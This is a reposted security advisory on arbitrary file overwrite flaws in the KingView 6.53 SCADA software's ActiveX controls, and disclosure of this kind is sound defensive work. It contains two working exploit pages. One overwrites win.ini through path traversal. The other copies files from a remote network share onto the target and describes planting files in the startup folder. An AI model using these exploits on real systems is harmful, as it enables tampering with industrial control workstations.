WellinTech KingView ActiveX Multiple Arbitrary File Overwrite Vulnerability

Source: Internet
Author: User

Release date: 2013-09-04

Affected Systems:
WellinTech KingView 6.53
Description:
--------------------------------------------------------------------------------
Bugtraq id: 62419

KingView is the first SCADA product for monitoring and controlling automation devices and processes in small and medium-sized projects, launched by the Asian Control Corporation.

KingView 6.53 does not properly filter user input, and its implementation contains multiple arbitrary file overwrite vulnerabilities. An attacker can save arbitrary files on the affected computer in the context of the application.

<* Source: Blake

Link: http://ics-cert.us-cert.gov/alerts/ICS-ALERT-13-256-01
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Use them at your own risk!

<!--
KingView ActiveX Control (KChartXY) Remote File Creation/Overwrite
Vendor: http://www.wellintech.com
Version: KingView 6.53
Tested on: Windows XP SP3/IE
Download: http://www.wellintech.com/documents/KingView6.53_EN.zip
Author: Blake

CLSID: A9A2011A-1E02-4242-AAE0-B239A6F88BAC
ProgId: KCHARTXYLib.KChartXY
Path: C:\Program Files\KingView\KChartXY.ocx
MemberName: SaveToFile
Safe for scripting: False
Safe for init: False
Kill Bit: False
IObjectSafety not implemented

Description: Proof of concept overwrites the win.ini file
-->
<html>
<object classid='clsid:A9A2011A-1E02-4242-AAE0-B239A6F88BAC' id='target'></object>
<script language='vbscript'>

arg1 = "..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\WINDOWS\win.ini"

target.SaveToFile arg1

</script>
</html>

<html>
<object classid='clsid:F494550F-A028-4817-A7B5-E5F2DCB4A47E' id='target'></object>
<!--
KingView Insecure ActiveX Control - SuperGrid
Vendor: http://www.wellintech.com
Version: KingView 6.53
Tested on: Windows XP SP3/IE
Download: http://www.wellintech.com/documents/KingView6.53_EN.zip
Author: Blake

CLSID: F494550F-A028-4817-A7B5-E5F2DCB4A47E
ProgId: SUPERGRIDLib.SuperGrid
Path: C:\Program Files\KingView\SuperGrid.ocx
MemberName: ReplaceDBFile
Safe for scripting: False
Safe for init: False
Kill Bit: False
IObjectSafety not implemented
-->
<title>KingView Insecure ActiveX Control Proof of Concept - SuperGrid.ocx</title>
<p>This proof of concept will copy any arbitrary file from one location to a second location. A malicious user may be able to use this to copy a file from an attacker controlled share to the target or from the target to an attacker controlled system (i.e. from an attacker share to the startup folder). It can also be used to overwrite existing files.</p>

<input type=button onclick="copyfile()" value="Do It!">
<script>
function copyfile()
{
var file1 = "\\\\192.168.1.165\\share\\poc.txt"; // source
var file2 = "c:\\WINDOWS\\poc.txt"; // destination
result = target.ReplaceDBFile(file1, file2);
}

</script>
</html>

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

Wellintech
----------
The vendor has not yet released a patch or an upgrade that fixes this issue. Users of the software should watch the vendor's homepage for the latest version:

http://www.kingview.com/products/detail.aspx?contentid=24
